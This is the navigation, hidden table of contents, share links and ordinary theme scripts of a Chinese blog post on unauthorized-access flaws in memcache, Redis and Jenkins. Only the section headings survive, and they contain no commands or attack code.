          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">未授权访问漏洞总结</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#11211%E7%AB%AF%E5%8F%A3%E2%80%93memcache"><span class="toc-number">1.0.1.</span> <span class="toc-text">11211端口–memcache</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.0.1.1.</span> <span class="toc-text">漏洞介绍</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">1.0.1.2.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#telnet%E7%9B%B4%E6%8E%A5%E8%BF%9E%E6%8E%A5%E7%9B%AE%E6%A0%87%E7%AB%AF%E5%8F%A3"><span class="toc-number">1.0.1.2.1.</span> <span class="toc-text">telnet直接连接目标端口</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#nmap%E6%89%AB%E6%8F%8F"><span class="toc-number">1.0.1.2.2.</span> <span class="toc-text">nmap扫描</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E6%8C%87%E4%BB%A4"><span class="toc-number">1.0.1.3.</span> <span class="toc-text">常用指令</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6379%E7%AB%AF%E5%8F%A3%E2%80%93Redis"><span class="toc-number">1.0.2.</span> <span class="toc-text">6379端口–Redis</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Redis%E7%AE%80%E4%BB%8B%E5%8F%8A%E6%90%AD%E5%BB%BA%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">1.0.2.1.</span> <span class="toc-text">Redis简介及搭建实验环境</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Redis%E9%BB%98%E8%AE%A4%E7%AB%AF%E5%8F%A3"><span class="toc-number">1.0.2.2.</span> <span class="toc-text">Redis默认端口</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%BF%9E%E6%8E%A5Redis%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="toc-number">1.0.2.3.</span> <span class="toc-text">连接Redis服务器</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Redis%E7%89%B9%E7%82%B9"><span class="toc-number">1.0.2.4.</span> <span class="toc-text">Redis特点</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%91%BD%E4%BB%A4"><span class="toc-number">1.0.2.5.</span> <span class="toc-text">常见命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%BF%AE%E6%94%B9"><span class="toc-number">1.0.2.6.</span> <span class="toc-text">配置文件修改</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-1"><span class="toc-number">1.0.2.7.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#linux"><span class="toc-number">1.0.2.7.1.</span> <span class="toc-text">linux</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E4%B8%8E%E9%98%B2%E5%BE%A1"><span class="toc-number">1.0.2.7.1.1.</span> <span class="toc-text">redis未授权访问漏洞利用与防御</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#ssh-%E7%99%BB%E5%BD%95%E2%80%93%E5%85%AC%E9%92%A5%E7%99%BB%E5%BD%95"><span class="toc-number">1.0.2.7.2.</span> <span class="toc-text">ssh 登录–公钥登录</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-number">1.0.2.7.3.</span> <span class="toc-text">利用</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#ssh-keygen%E5%85%AC%E9%92%A5%E7%84%B6%E5%90%8E%E4%BD%BF%E7%94%A8%E7%A7%81%E9%92%A5%E7%99%BB%E9%99%86"><span class="toc-number">1.0.2.7.4.</span> <span class="toc-text">ssh-keygen公钥然后使用私钥登陆</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%BE%80web%E7%89%A9%E7%90%86%E8%B7%AF%E5%BE%84%E5%86%99webshell"><span class="toc-number">1.0.2.7.5.</span> <span class="toc-text">往web物理路径写webshell</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%98%B2%E5%BE%A1"><span class="toc-number">1.0.2.7.6.</span> <span class="toc-text">防御</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#redis%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.0.2.7.6.1.</span> <span class="toc-text">redis主从复制漏洞</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#redis%E4%B8%8Egopger%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.0.2.7.6.2.</span> <span class="toc-text">redis与gopger协议</span></a></li></ol></li><li class="toc-item toc-level-5"><a class="toc-link" href="#windows"><span class="toc-number">1.0.2.7.7.</span> <span class="toc-text">windows</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E9%99%90%E5%88%B6"><span class="toc-number">1.0.2.7.7.1.</span> <span class="toc-text">限制</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E4%B8%8E%E9%98%B2%E5%BE%A1-1"><span class="toc-number">1.0.2.7.7.2.</span> <span class="toc-text">redis未授权访问漏洞利用与防御</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8080%E7%AB%AF%E5%8F%A3%E2%80%93Jenkins"><span class="toc-number">1.0.3.</span> <span class="toc-text">8080端口–Jenkins</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">1.0.3.1.</span> <span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-2"><span class="toc-number">1.0.3.2.</span> <span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E9%AA%8C%E8%AF%81"><span class="toc-number">1.0.3.2.1.</span> <span class="toc-text">漏洞验证</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E5%86%99shell"><span class="toc-number">1.0.3.2.2.</span> <span class="toc-text">未授权访问写shell</span></a></li></ol></li></ol></li></ol></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&text=渗透测试--未授权访问漏洞常见"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&is_video=false&description=渗透测试--未授权访问漏洞常见"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=渗透测试--未授权访问漏洞常见&body=Check out this article: http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&title=渗透测试--未授权访问漏洞常见"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&name=渗透测试--未授权访问漏洞常见&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://s1eady.top/2020/06/15/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95--%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81/&t=渗透测试--未授权访问漏洞常见"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2018.12.8-2020
    steady
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


</body>
</html>
